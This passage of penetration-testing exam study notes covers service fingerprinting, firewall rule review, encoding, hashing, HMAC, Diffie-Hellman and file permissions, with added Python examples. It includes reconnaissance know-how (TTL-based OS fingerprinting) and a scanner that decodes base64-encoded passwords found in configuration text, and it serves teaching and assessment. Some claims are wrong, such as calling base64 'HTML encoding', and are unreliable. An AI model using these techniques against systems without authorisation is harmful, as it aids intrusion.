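The TTL reasoning above (123 is nearest to 128, so a Windows host 5 hops away; 60 is nearest to 64, so a Unix host 4 hops away) is mechanical enough to script. The Python below is an added example, not from the original notes: it infers the initial TTL, hop distance and likely OS family from an observed TTL using the default values listed in the B1 section, and extracts the TTL from ping output lines in both the Windows (`TTL=`) and Linux (`ttl=`) formats. The ping transcript is constructed, and the "low confidence" threshold of 30 hops is an assumption of this example; the method is a heuristic, since a host with a non-default TTL, or one very far away, will be misclassified.

```python
# Added example: infer initial TTL, hop distance and likely OS family from an observed TTL,
# and pull the TTL out of ping output. Default values are those listed in the notes;
# the ping lines are constructed, and the 30-hop confidence cut-off is an assumption.
import re
from typing import List, Optional

DEFAULT_TTLS = {64: "Linux/FreeBSD (Unix-like)", 128: "Windows", 255: "Cisco/network device"}
TTL_RE = re.compile(r"\bTTL=(\d{1,3})\b", re.IGNORECASE)   # Windows prints TTL=, Linux ttl=


def infer_initial_ttl(observed: int) -> int:
    """Nearest default at or above the observed value (a TTL only ever decreases in transit)."""
    if not 0 < observed <= 255:
        raise ValueError("TTL must be 1..255")
    return min(base for base in DEFAULT_TTLS if base >= observed)


def fingerprint_ttl(observed: int) -> dict:
    """Initial TTL, hop count (initial minus observed) and the OS family that default implies."""
    base = infer_initial_ttl(observed)
    hops = base - observed
    return {"initial_ttl": base, "hops": hops, "guess": DEFAULT_TTLS[base],
            # a host more than ~30 hops away is implausible; the TTL is probably non-default
            "confidence": "low" if hops > 30 else "normal"}


def ttl_from_ping_line(line: str) -> Optional[int]:
    """Return the TTL printed on a ping reply line, or None for timeouts and header lines."""
    m = TTL_RE.search(line)
    return int(m.group(1)) if m else None


def fingerprint_ping_output(output: str) -> List[dict]:
    """One fingerprint per reply line; non-reply lines are skipped."""
    ttls = (ttl_from_ping_line(line) for line in output.splitlines())
    return [fingerprint_ttl(t) for t in 

 ttls if t is not None]


# Constructed sample output in the same formats as the notes' ping transcripts.
SAMPLE_PING = """Pinging example.invalid [203.0.113.7] with 32 bytes of data:
Reply from 203.0.113.7: bytes=32 time=15ms TTL=60
Reply from 203.0.113.7: bytes=32 time=14ms TTL=60
Request timed out.
64 bytes from 203.0.113.9: icmp_seq=1 ttl=123 time=20.1 ms
"""

if __name__ == "__main__":
    for fp in fingerprint_ping_output(SAMPLE_PING):
        print(fp)
```

Applied to the sample, the two `TTL=60` replies give an initial TTL of 64 and 4 hops (the notes' Unix case), and the `ttl=123` line gives 128 and 5 hops (the Windows case); the timeout line yields nothing.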
B9 - Application Fingerprinting and Evaluating Unknown Services
Determining server types and network application versions from application banners.
WTF…
Evaluation of responsive but unknown network applications.
More WTF…
B10 - Network Access Control Analysis
Reviewing firewall rule bases and network access control lists.
OK, whatever… the final rule has to be a drop-all: ANY ANY DENY/DROP.
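To give the two review tasks some substance (B6: the risk of unrestricted outbound connections; B10: reviewing a rule base that must end in ANY ANY DENY/DROP), here is an added Python example, not from the original notes, of a first-match rule-base evaluator with a small linter. It reports a missing cleanup rule, rules shadowed by an earlier broader rule (so they can never fire), and allow rules that permit any destination on any port (the egress problem). The rule syntax and the sample rule base are constructed for the example and do not follow any particular product.

```python
# Added example: a first-match firewall rule-base evaluator and linter for rule-base review.
# Rule syntax and sample rules are constructed for this example, not taken from any product.
from ipaddress import ip_address, ip_network
from typing import List, Tuple, Union

Port = Union[int, Tuple[int, int], str]    # 443, (1024, 65535) or "any"


def rule(action: str, proto: str, src: str, dst: str, dport: Port, name: str) -> dict:
    return {"action": action, "proto": proto, "src": ip_network(src), "dst": ip_network(dst),
            "dport": dport, "name": name}


def _port_range(p: Port) -> Tuple[int, int]:
    if p == "any":
        return (0, 65535)
    return p if isinstance(p, tuple) else (p, p)


def matches(r: dict, pkt: dict) -> bool:
    lo, hi = _port_range(r["dport"])
    return (r["proto"] in ("any", pkt["proto"]) and ip_address(pkt["src"]) in r["src"]
            and ip_address(pkt["dst"]) in r["dst"] and lo <= pkt["dport"] <= hi)


def evaluate(rules: List[dict], pkt: dict) -> Tuple[str, str]:
    """First matching rule wins; with no match most firewalls drop silently (implicit deny)."""
    for r in rules:
        if matches(r, pkt):
            return r["action"], r["name"]
    return "deny", "implicit-default"


def covers(outer: dict, inner: dict) -> bool:
    """True when every packet matching `inner` also matches `outer`, so `inner` can never fire."""
    ilo, ihi = _port_range(inner["dport"])
    olo, ohi = _port_range(outer["dport"])
    return (outer["proto"] in ("any", inner["proto"]) and inner["src"].subnet_of(outer["src"])
            and inner["dst"].subnet_of(outer["dst"]) and olo <= ilo and ihi <= ohi)


def is_cleanup_rule(r: dict) -> bool:
    """The explicit ANY ANY DENY that should close every rule base."""
    return (r["action"] == "deny" and r["proto"] == "any" and r["src"].prefixlen == 0
            and r["dst"].prefixlen == 0 and r["dport"] == "any")


def lint(rules: List[dict]) -> List[str]:
    findings = []
    if not rules or not is_cleanup_rule(rules[-1]):
        findings.append("no explicit final any/any deny (cleanup) rule")
    for i, r in enumerate(rules):
        for earlier in rules[:i]:
            if covers(earlier, r):
                findings.append(f"rule '{r['name']}' is shadowed by earlier rule '{earlier['name']}'")
                break
        if r["action"] == "allow" and r["dst"].prefixlen == 0 and r["dport"] == "any":
            findings.append(f"rule '{r['name']}' permits unrestricted outbound access (egress risk)")
    return findings


# Constructed rule base with two classic review findings.
RULES = [
    rule("allow", "tcp", "0.0.0.0/0", "203.0.113.10/32", 443, "inet-to-dmz-https"),
    rule("deny", "tcp", "198.51.100.0/24", "203.0.113.10/32", 443, "block-bad-range"),   # never hit
    rule("allow", "tcp", "203.0.113.0/24", "10.0.0.5/32", 1433, "dmz-to-db"),
    rule("allow", "tcp", "10.0.0.0/8", "0.0.0.0/0", "any", "internal-egress-any"),     # too broad
    rule("deny", "any", "0.0.0.0/0", "0.0.0.0/0", "any", "cleanup"),
]

if __name__ == "__main__":
    print(evaluate(RULES, {"proto": "tcp", "src": "198.51.100.7", "dst": "203.0.113.10", "dport": 443}))
    for finding in lint(RULES):
        print("-", finding)
```

Because evaluation is first-match, the deny for 198.51.100.0/24 placed after the broad HTTPS allow never fires, which `evaluate` demonstrates and `lint` reports; moving it above the allow fixes it. The egress rule is the B6 point: internal hosts may reach any address on any port, so a compromised workstation has an unrestricted path out.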
B11 - Cryptography
Differences between encryption and encoding.
Encoding transforms data into another format using a publicly available scheme, so that it can easily be reversed; its purpose is to maintain data usability.
Encoding is the process of transforming data so that it may be transmitted without danger over a communication channel or stored without danger on a storage medium. For instance, computer hardware does not manipulate text, it merely manipulates bytes, so a text encoding is a description of how text should be transformed into bytes.
HTML Encoding
Base32/64 are examples of HTML encoding.
To display an HTML page correctly, a web browser must know which character set (character encoding) to use. ASCII
was the first character encoding standard (also called character set). ASCII defined 128 different alphanumeric
characters that could be used on the internet. ANSI (Windows-1252) was the original Windows character set, with
support for 256 different character codes. ISO-8859-1 was the default character set for HTML 4. This character set
also supported 256 different character codes. Because ANSI and ISO-8859-1 were so limited, HTML 4 also supported
UTF-8. UTF-8 (Unicode) covers almost all of the characters and symbols in the world.
The default character encoding for HTML5 is UTF-8.
<meta charset="UTF-8">
Similarly, HTTP does not allow all characters to be transmitted safely, so it may be necessary to encode data using
base64 (uses only letters, numbers and two safe characters) or other encoding schemes such as HTMLEncode.
When encoding or decoding, the emphasis is placed on everyone having the same algorithm, and that algorithm is
usually well-documented, widely distributed and fairly easily implemented. Anyone is eventually able to decode
encoded data.
Base64 is a form of HTML encoding.
Base32 is a valid transfer encoding, but is not that useful due to its limited character set. It uses a 32-character set comprising the twenty-six upper-case letters A–Z and the digits 2–7.
IIS HTMLEncode converts characters as follows:
- The less-than character (<) is converted to &lt;
- The ampersand character (&) is converted to &amp;
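The encodings discussed in this section, side by side in an added Python example that is not part of the original notes. It produces the base64, base32, hex and HTML-escaped forms of the same bytes, checks that each round-trips with no key, confirms the base32 output stays inside the A–Z and 2–7 alphabet, and then scans a constructed configuration line for base64-looking tokens and decodes them, which is the practical point of "anyone is eventually able to decode encoded data" when an application stores a password that way. The token pattern and the config line are constructed for the example.

```python
# Added example: the encodings discussed above side by side, plus a scanner that finds
# base64 tokens in text and decodes them, demonstrating that encoding hides nothing.
# The config line is constructed; the helper names are this example's own.
import base64
import binascii
import html
import re
from typing import List, Tuple

# A base64 token: 12+ alphabet chars, optional padding, not glued to other alphabet chars.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")
BASE32_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=")


def encode_all(data: bytes) -> dict:
    """Every scheme here is public and reversible; none of them needs a key."""
    return {"base64": base64.b64encode(data).decode("ascii"),
            "base32": base64.b32encode(data).decode("ascii"),
            "hex": data.hex(),
            "html": html.escape(data.decode("utf-8", "replace"), quote=False)}


def decode_all(enc: dict) -> bytes:
    """Round trip: each transfer encoding decodes back to the same bytes."""
    raw = base64.b64decode(enc["base64"], validate=True)
    if base64.b32decode(enc["base32"]) != raw or bytes.fromhex(enc["hex"]) != raw:
        raise ValueError("encodings disagree")
    return raw


def is_base32_text(s: str) -> bool:
    """True when every character is in the RFC 4648 base32 alphabet (A-Z, 2-7, padding)."""
    return bool(s) and set(s) <= BASE32_ALPHABET


def find_base64_secrets(text: str) -> List[Tuple[str, str]]:
    """Find base64-looking tokens and decode the ones that yield printable ASCII text."""
    hits = []
    for m in B64_TOKEN.finditer(text):
        token = m.group(0)
        if len(token) % 4:                       # base64 always comes in groups of four
            continue
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            hits.append((token, decoded))
    return hits


# Constructed configuration fragment: the password is merely encoded, not encrypted.
SAMPLE_CONFIG = 'db_user = "app"\ndb_password = "cGFzc3dvcmQxMjM="   # constructed sample\n'

if __name__ == "__main__":
    enc = encode_all(b"CREST")
    print(enc, decode_all(enc))
    print(find_base64_secrets(SAMPLE_CONFIG))
```

For the bytes `CREST` the base64 form is `Q1JFU1Q=`, the hex form `4352455354`, and the base32 form uses only the upper-case letters and digits 2–7; the scanner recovers `password123` from the sample line without any secret.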
Symmetric / asymmetric encryption
Private (Secret) Key / Public Key
Symmetry means two things are the same. In cryptography it refers to the key: the same key is used to encrypt and decrypt the plain text.
Public-key cryptography uses different keys to encrypt and decrypt. It uses key pairs: each user gets two keys, a public key for the public and a private key which is kept secret. Anything which is encrypted with one key from a pair can be decrypted with the other key from that pair; the keys must be from the same pair. It is slower, but provides manageable key counts for large organisations.
Block cipher and cipher block chaining (CBC)
A block cipher is a method of encrypting text (to produce ciphertext) in which a cryptographic key and algorithm are
applied to a block of data (for example, 64 contiguous bits) at once as a group rather than to one bit at a time. The
main alternative method, used much less frequently, is called the stream cipher.
Cipher block chaining (CBC) is a mode of operation for a block cipher where the cipher text of the previous block
impacts the next block. It uses a chaining mechanism that causes the decryption of a block of ciphertext to depend
on all the preceding ciphertext blocks. As a result, the entire validity of all preceding blocks is contained in the
immediately previous ciphertext block. A single bit error in a ciphertext block affects the decryption of all
subsequent blocks. Rearrangement of the order of the ciphertext blocks causes decryption to become corrupted.
Encryption algorithms: DES, 3DES, AES, RSA, RC4.
DES - The Data Encryption Standard (DES) is a symmetric-key algorithm for the encryption of electronic data. DES is
now considered to be insecure for many applications. This is mainly due to the 56-bit key size being too small.
3DES - Triple DES (3DES), officially the Triple Data Encryption Algorithm (TDEA or Triple DEA), is a symmetric-key
block cipher, which applies the DES cipher algorithm three times to each data block. Key sizes 168, 112 or 56 bits
(keying option 1, 2, 3 respectively) (multiples of 56)
AES - Advanced Encryption Standard (AES), also known by its original name Rijndael is a specification for the
encryption of electronic data established by the U.S. National Institute of Standards and Technology (NIST) in 2001.
AES is a subset of the Rijndael cipher developed by two Belgian cryptographers. It supersedes the Data Encryption
Standard (DES) which was published in 1977. The algorithm described by AES is a symmetric-key algorithm. Keys:
128, 192 and 256 bits (multiples of 64)
RSA - An asymmetric cryptographic algorithm. It is based on the fact that finding the factors of an integer is hard (the
factoring problem). A user of RSA creates and then publishes the product of two large prime numbers, along with an
auxiliary value, as their public key. The prime factors must be kept secret. Anyone can use the public key to encrypt a
message, but with currently published methods, if the public key is large enough, only someone with knowledge of
the prime factors can feasibly decode the message.
RC4 – (Exam tried to confuse with RC5) In cryptography, RC4 (Rivest Cipher 4) is a stream cipher (as contrasted with
CBC). While remarkable for its simplicity and speed in software, multiple vulnerabilities have been discovered in RC4,
rendering it insecure. RC4 is a symmetric stream cipher that was used widely to encrypt network communications in
the 1980s and 1990s. It was originally not widely used because it was maintained as a proprietary trade secret but
the algorithm has since become public knowledge.
A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit
stream (keystream). In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit
of the keystream, to give a digit of the ciphertext stream.
Hashes: SHA1 and MD5
SHA-1 (Secure Hash Algorithm 1) is a cryptographic hash function which takes an input and produces a 160-bit (20-
byte) hash value known as a message digest - typically rendered as a hexadecimal number, 40 digits long.
The MD5 algorithm is a widely used hash function producing a 128-bit hash value, rendered as a hexadecimal number 32 digits long. Although MD5 was initially designed to be used as a cryptographic hash function, it has been found to suffer from extensive vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional corruption.
Like most hash functions, MD5 is neither encryption nor encoding. It can be cracked by brute-force attack and suffers from extensive vulnerabilities.
Message Integrity codes: HMAC (Hashed Message Authentication Code)
In cryptography, an HMAC (expanded as either keyed-hash message authentication code or hash-based message authentication code) is a specific type of message authentication code (MAC) involving a cryptographic hash function and a secret cryptographic key. It may be used to simultaneously verify both the data integrity and the authenticity of a message, as with any MAC. Any cryptographic hash function, such as MD5 or SHA-1, may be used in the calculation of an HMAC; the resulting MAC algorithm is termed HMAC-X, where X is the hash function used (e.g. HMAC-MD5 or HMAC-SHA1). The cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function, the size of its hash output, and the size and quality of the key.
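The hash and HMAC material above, worked through in an added Python example (not from the original notes) using the standard library: SHA-1 and MD5 digests with their 40- and 32-digit hex lengths, an HMAC built from scratch per RFC 2104 and checked against `hmac`, constant-time tag comparison, and a tamper demonstration that shows why a bare hash shipped beside a message is only a corruption check (the forger recomputes it) while an HMAC needs the key. HMAC-SHA1 is used to match the notes' naming; the key and messages are constructed.

```python
# Added example: digests and HMACs with Python's standard library, including a from-scratch
# HMAC (RFC 2104) checked against the hmac module, and a tamper test showing why a bare hash
# is not an integrity control when the attacker can rewrite both message and hash.
# Key and messages are constructed.
import hashlib
import hmac


def digest_hex(algorithm: str, data: bytes) -> str:
    """Hex digest: 32 digits for MD5 (128 bits), 40 for SHA-1 (160 bits)."""
    return hashlib.new(algorithm, data).hexdigest()


def hmac_manual(key: bytes, msg: bytes, algorithm: str = "sha1") -> str:
    """HMAC = H((K ^ opad) || H((K ^ ipad) || msg)); keys longer than the block are hashed first."""
    block_size = hashlib.new(algorithm).block_size          # 64 bytes for MD5/SHA-1/SHA-256
    if len(key) > block_size:
        key = hashlib.new(algorithm, key).digest()
    key = key.ljust(block_size, b"\x00")
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5C for b in key)
    inner = hashlib.new(algorithm, ipad + msg).digest()
    return hashlib.new(algorithm, opad + inner).hexdigest()


def hmac_stdlib(key: bytes, msg: bytes, algorithm: str = "sha1") -> str:
    return hmac.new(key, msg, algorithm).hexdigest()


def verify_hmac(key: bytes, msg: bytes, tag_hex: str, algorithm: str = "sha1") -> bool:
    """Constant-time comparison avoids leaking how many leading bytes of the tag matched."""
    return hmac.compare_digest(hmac_stdlib(key, msg, algorithm), tag_hex)


def tamper_demo(key: bytes, algorithm: str = "sha1") -> dict:
    """Sender ships (msg, hash) and (msg, hmac). A forger rewrites msg and recomputes the hash
    with no key, so the receiver's hash check still passes; the HMAC check does not."""
    msg = b"transfer 100 to account 42"          # constructed
    forged = b"transfer 900 to account 42"
    shipped_hash, shipped_tag = digest_hex(algorithm, msg), hmac_stdlib(key, msg, algorithm)
    forged_hash = digest_hex(algorithm, forged)              # forger can compute this
    forged_tag = hmac_stdlib(b"guess", forged, algorithm)    # forger does not hold the real key
    return {"hash_check_passes": digest_hex(algorithm, forged) == forged_hash,
            "hmac_check_passes": verify_hmac(key, forged, forged_tag, algorithm),
            "original_hash_ok": digest_hex(algorithm, msg) == shipped_hash,
            "original_hmac_ok": verify_hmac(key, msg, shipped_tag, algorithm)}


if __name__ == "__main__":
    print(digest_hex("md5", b""), digest_hex("sha1", b""))
    print(hmac_manual(b"key", b"The quick brown fox jumps over the lazy dog", "md5"))
    print(tamper_demo(b"constructed-secret-key"))
```

The empty-string digests (MD5 d41d8cd98f00b204e9800998ecf8427e, SHA-1 da39a3ee5e6b4b0d3255bfef95601890afd80709) are handy sanity values; the manual HMAC agrees with the library for short and over-long keys, and `tamper_demo` returns a passing hash check with a failing HMAC check for the forged message.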
Perfect forward secrecy (PFS)
In cryptography, forward secrecy (FS), also known as perfect forward secrecy (PFS), is a property of key agreement
protocols: session keys are derived from fresh, ephemeral key-exchange values for every session, and the server's
long-term private key is used only to authenticate the exchange, never to protect the session keys. Compromise of
that long-term key at a later date therefore does not let an attacker decrypt sessions recorded earlier. In TLS this
is provided by the ephemeral (EC)DHE key exchanges; static RSA key exchange (the client encrypts the pre-master
secret to the server's certificate key) has no forward secrecy and was removed from TLS 1.3.
Diffie-Hellman Key Exchange
Diffie-Hellman is a way of generating a shared secret between two parties in such a way that the secret can't be
learned by observing the communication. That's an important distinction: you're not sending a key during the
exchange, you're creating one together. Each side chooses a private exponent, sends g^x mod p in the clear, and
raises the other side's value to its own exponent; both arrive at g^xy mod p, while an observer who sees only g^x
and g^y faces the discrete logarithm problem.
This is particularly useful because you can use this technique to agree a key with someone and then start
encrypting your traffic with it. Even if the traffic is recorded and later analysed, recovering the key is
computationally infeasible for properly sized groups, even though the exchanges that created it were visible. This
is where perfect forward secrecy comes from: the key was never saved, never transmitted and never visible anywhere,
and with fresh exponents per session no long-term secret can reveal it later.
Diffie-Hellman (1976) is public-key cryptography in the sense that each party holds a private value and publishes a
public value, and it predates RSA (1977); but it is a key agreement scheme, not an encryption scheme, because
nothing is encrypted or decrypted during the exchange. Its output is used to key a symmetric algorithm such as AES.
Caveat: a bare exchange authenticates nobody, so an active attacker can run a separate exchange with each side
(man-in-the-middle). Protocols such as TLS and IKE therefore sign or otherwise authenticate the exchanged values.
Group size matters too: 1024-bit MODP groups are considered weak (Logjam); use 2048-bit or larger groups, or
elliptic-curve Diffie-Hellman (ECDH).
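Worked example added to these notes (not from the original page) covering both the exchange itself and the forward-secrecy point above: two parties agree a key over the 1024-bit MODP group from RFC 2409 (the modulus constant is transcribed here for the demo and is assumed correct; 1024-bit groups are too weak for real use, as noted). Running a fresh exchange per session yields unrelated keys, which is what forward secrecy rests on. Party and agree are illustrative names, not a library API.

```python
import hashlib
import secrets

# RFC 2409 "group 2" (1024-bit MODP, generator 2), transcribed for this demo only.
# Assumption: for real deployments use RFC 3526 group 14 (2048-bit) or larger, or ECDH.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF", 16)
G = 2

class Party:
    """One side of the exchange. Only .public ever leaves the host."""
    def __init__(self, private: int = 0):
        self.private = private or secrets.randbelow(P - 3) + 2   # ephemeral exponent x in [2, p-2]
        self.public = pow(G, self.private, P)                      # g^x mod p, sent in the clear

    def shared_secret(self, peer_public: int) -> int:
        # Reject 0, 1 and p-1: with those an attacker forces the secret to a known value.
        if not 1 < peer_public < P - 1:
            raise ValueError("invalid peer public value")
        return pow(peer_public, self.private, P)                   # (g^y)^x = g^xy mod p

def derive_key(shared: int) -> bytes:
    """Never use g^xy directly; run it through a KDF to get a uniform 256-bit symmetric key."""
    return hashlib.sha256(shared.to_bytes(128, "big")).digest()

def agree(a: Party, b: Party) -> tuple:
    """What each side computes from the other's public value; an observer sees only P, G, A, B."""
    return derive_key(a.shared_secret(b.public)), derive_key(b.shared_secret(a.public))

def session_key() -> bytes:
    """A fresh exchange with fresh exponents: run twice it yields unrelated keys (forward secrecy)."""
    k_alice, k_bob = agree(Party(), Party())
    assert k_alice == k_bob
    return k_alice

def accepts_peer_value(value: int) -> bool:
    """True if a party would accept this value from its peer."""
    try:
        Party(3).shared_secret(value)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    print("session 1:", session_key().hex())
    print("session 2:", session_key().hex())   # different: nothing long-term links the two
```

Note what is missing: neither party proves who it is, so this exchange alone is open to the man-in-the-middle attack described above; TLS signs the ephemeral public values with the certificate key to close that gap.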
Elliptic-curve cryptography (ECC)
(A prime number can only be divided by 1 or itself: 2, 3, 5, 7, 11, 13, 17, ... Primes underpin RSA, finite-field
Diffie-Hellman and the prime-field curves used in ECC.)
Elliptic-curve cryptography (ECC) is an approach to public-key cryptography based on the algebraic structure of
elliptic curves over finite fields. ECC requires smaller keys than RSA or finite-field Diffie-Hellman to provide
equivalent security, because the best known attacks on elliptic-curve discrete logarithms are generic (square-root
time) rather than the sub-exponential index-calculus attacks that apply to RSA and classic DH.
Elliptic curves are applicable for key agreement (ECDH), digital signatures (ECDSA, EdDSA), pseudo-random
generators and other tasks. Indirectly, they can be used for encryption by combining the key agreement with a
symmetric encryption scheme.
The primary benefit promised by elliptic curve cryptography is a smaller key size, reducing storage and transmission
requirements, i.e. an elliptic curve group can provide the same level of security afforded by an RSA-based system
with a large modulus and correspondingly larger key: for example, a 256-bit elliptic curve public key provides
comparable security to a 3072-bit RSA public key (the 128-bit security level). Curve choice matters in practice:
use standard, well-reviewed curves (P-256, Curve25519) and constant-time implementations.
B12 - Applications of Cryptography
SSL
SSL: Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that
provide communications security over a computer network. TLS sits between the transport layer (TCP) and the
application protocol (HTTP, SMTP, IMAP ...); it is usually placed at OSI layer 5/6 rather than 4, and it needs a
reliable transport underneath. All SSL versions and TLS 1.0/1.1 are deprecated; only TLS 1.2 and 1.3 should be
offered.
The TLS protocol aims primarily to provide privacy and data integrity between two communicating computer
applications. A client server connection will have one or more of the following properties:
 The connection is private (or secure) because symmetric cryptography is used to encrypt the data
transmitted. The keys for this symmetric encryption are generated uniquely for each connection and are
based on a shared secret negotiated at the start of the session (the handshake). The server and client negotiate
the protocol version, cipher suite and keys to use before the first byte of application data is transmitted.
 The identity of the communicating parties can be authenticated using public-key cryptography (typically only
the server, via an X.509 certificate; client certificates are optional).
 The connection ensures integrity because each record transmitted includes a message integrity check (a MAC,
or the tag of an AEAD cipher such as AES-GCM) to prevent undetected loss or alteration of the data during
transmission.
IPsec
IPSec: IPsec is typically used in conjunction with IKE (Internet Key Exchange) for key management. IPsec works at
layer 3 (the network layer) of the OSI network model to protect (and, in tunnel mode, encapsulate) IP packets. Once a
VPN tunnel has been established, any application (Web, e-mail, FTP, telnet, even VoIP) can use it without
discrimination.
IPsec supports multiple encryption algorithms (DES and 3DES, both obsolete; AES-CBC; AES-GCM) and multiple integrity
mechanisms (HMAC-MD5, HMAC-SHA1, HMAC-SHA2), as well as peer authentication via pre-shared keys or X.509
certificates. RC4 is not an IPsec algorithm.
SSH
See SSH.
PGP
PGP: PGP uses symmetric and asymmetric keys to encrypt data being transferred across networks. It was developed
by the American computer scientist Phil Zimmermann, who made it available for non-commercial use for no charge in
1991. To encrypt data, PGP generates a random symmetric session key, encrypts the data with it, and then encrypts the
session key with the recipient's public key (hybrid encryption); signing uses the sender's private key over a hash
of the message. OpenPGP (RFC 4880) is the standardised format, implemented by GnuPG.
Common wireless (802.11) encryption protocols: WEP, WPA, TKIP (see below)
B13 - File System Permissions
File permission attributes within Unix and Windows file systems and their security implications.
UNIX: Owner, Group, Other (Everyone) each have r(4) w(2) x(1), written as three octal digits (e.g. 755).
Exactly one of the three classes applies to a given user, chosen in this order:
 If the user owns the file, the owner permissions determine the access.
 Otherwise, if the file's group is one of the user's groups, the group permissions determine the access.
 Otherwise the other permissions are used.
The check stops at the first match, so an owner whose class grants less than the group class gets the lesser
access. root bypasses these checks entirely.
chmod u+rwx test
$ ls -l
drwxr--r-- 1 fred editors 4096 drafts
In this example, drafts is a directory (denoted by the file type character d), and the characters after this
indicate the permissions:
 rwx: the owner (fred) has the right to read (r), write (w) and execute (x)
 r--: group members (users part of the editors group) have read-only permissions; write and execute are
not permitted, as denoted by the hyphen characters (-)
 r--: others (users aside from the owner or members of editors) have read-only permissions; write and
execute are not permitted
On a directory, x means "traverse": r without x lets a user list the names in drafts but not open anything in it.
Security implications: the setuid/setgid bits (shown as s in the owner/group execute position, 4000/2000 in octal)
make a program run with the file owner's/group's privileges, so setuid-root binaries and world-writable files or
directories are the first things to look for when assessing a host; the sticky bit (t, 1000) on /tmp stops users
deleting each other's files.
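Worked example added to these notes (not from the original page): a parser for ls -l mode strings and the owner-then-group-then-other selection rule, applied to the drafts directory above and to the classic gotcha where the owner class is more restrictive than the group class. Function names are illustrative; fred/editors/alice/bob are the page's example and made-up users.

```python
import stat

CLASSES = (("read", 4), ("write", 2), ("execute", 1))

def parse_mode(mode_str: str) -> tuple:
    """'drwxr--r--' -> ('d', 0o744). Handles s/S (setuid/setgid) and t/T (sticky) as well."""
    ftype, perms = mode_str[0], mode_str[1:10]
    bits = 0
    for i, ch in enumerate(perms):
        if ch == "-":
            continue
        if ch in "rwx":
            bits |= 1 << (8 - i)          # position 0 is owner-read (0o400), 8 is other-execute (0o001)
        elif ch in "sS":
            bits |= stat.S_ISUID if i == 2 else stat.S_ISGID
            if ch == "s":                 # lowercase: the execute bit is set too
                bits |= 1 << (8 - i)
        elif ch in "tT":
            bits |= stat.S_ISVTX
            if ch == "t":
                bits |= 1 << (8 - i)
        else:
            raise ValueError(f"unexpected character {ch!r} in {mode_str!r}")
    return ftype, bits

def effective_access(mode_str: str, owner: str, group: str, user: str, user_groups) -> set:
    """Exactly one class applies, chosen owner -> group -> other; the check never falls through."""
    _, bits = parse_mode(mode_str)
    if user == "root":
        return {"read", "write", "execute"}   # root bypasses discretionary access control
    if user == owner:
        shift = 6
    elif group in user_groups:
        shift = 3
    else:
        shift = 0
    triad = (bits >> shift) & 0o7
    return {name for name, bit in CLASSES if triad & bit}

def risky_attributes(mode_str: str) -> list:
    """The attributes a host review flags first: setuid, setgid, world-writable (sticky dirs excepted)."""
    ftype, bits = parse_mode(mode_str)
    findings = []
    if bits & stat.S_ISUID:
        findings.append("setuid")
    if bits & stat.S_ISGID:
        findings.append("setgid")
    if bits & stat.S_IWOTH and not (ftype == "d" and bits & stat.S_ISVTX):
        findings.append("world-writable")
    return findings

if __name__ == "__main__":
    # The page's example: drwxr--r-- 1 fred editors 4096 drafts
    for user, groups in (("fred", {"editors"}), ("alice", {"editors"}), ("bob", {"users"})):
        print(user, sorted(effective_access("drwxr--r--", "fred", "editors", user, groups)))
    # The gotcha: owner class wins even when the group class would grant more
    print("fred on -r--rwx---:", sorted(effective_access("-r--rwx---", "fred", "editors", "fred", {"editors"})))
    print("-rwsr-xr-x:", risky_attributes("-rwsr-xr-x"))
```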
Windows Permissions
The SYSTEM account and the Administrators group have the same file privileges, but they have different functions.
The SYSTEM account is used by the operating system and by services that run under Windows.
 When an object is copied into another directory it inherits the access permissions in place at the destination
folder.
 When a file or directory is moved to another directory on the same NTFS volume, its explicit NTFS permissions
move with it; a move between volumes is a copy followed by a delete, so the object inherits the destination's
permissions.
Share permissions and NTFS permissions are evaluated separately and then combined:
 Within each layer, permissions from all of the user's groups are cumulative: the least restrictive applies.
 Between the two layers, the most restrictive wins. Share permissions only apply to access over the network
(SMB); a user logged on locally is governed by NTFS alone.
If "Tom" who is in the "Sales", "Finance" and "Staff" groups has:
Share Permissions: Sales – Read, Staff – Modify, Finance – Read
NTFS Permissions: Sales – Modify, Staff – Modify, Finance - Read
His cumulative NTFS permission is Modify (the least restrictive of Modify, Modify and Read) and his cumulative
share permission is also Modify (Staff grants it), so his effective access over the network is Modify. If we tweak
that a little and you have:
Share Permissions: Sales – Read, Staff – Read, Finance – Read
NTFS Permissions: Sales – Modify, Staff – Modify, Finance - Read
His cumulative NTFS permission is still Modify, but his cumulative share permission is Read, so his effective access
over the network is Read (and Modify if he logs on to the server locally).
The exception to this is that an explicit Deny overrides all Allow permissions (both for NTFS and Share). For
example,
 Read (NTFS) + Deny (NTFS) = no access (NTFS)
 Read (shared folder) + Deny (shared folder) = no access (shared folder)
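Worked example added to these notes (not from the original page): the share/NTFS combination rules above as code, run over Tom's two scenarios plus an explicit Deny. It assumes share "Change" and NTFS "Modify" are the same level for comparison purposes, and the ordering of levels is a simplification of the real ACE bit masks.

```python
from typing import Optional

# Permission levels from least to most permissive. Assumption: share "Change" and NTFS
# "Modify" are treated as the same level, and the real ACE bit masks are reduced to this ladder.
ORDER = ["Read", "Read & Execute", "Modify", "Full Control"]

def cumulative(aces, user_groups) -> str:
    """Effective level from one layer (share or NTFS) for a user holding user_groups.
    Allow entries accumulate to the most permissive; one explicit Deny overrides them all."""
    best: Optional[str] = None
    for principal, level, allow in aces:
        if principal not in user_groups:
            continue
        if not allow:
            return "No Access"                 # explicit Deny wins regardless of other entries
        if best is None or ORDER.index(level) > ORDER.index(best):
            best = level
    return best or "No Access"                 # no matching entry at all: implicit deny

def effective(share_aces, ntfs_aces, user_groups, over_network: bool = True) -> str:
    """Combine the two layers: share permissions only apply over SMB, and whichever layer is
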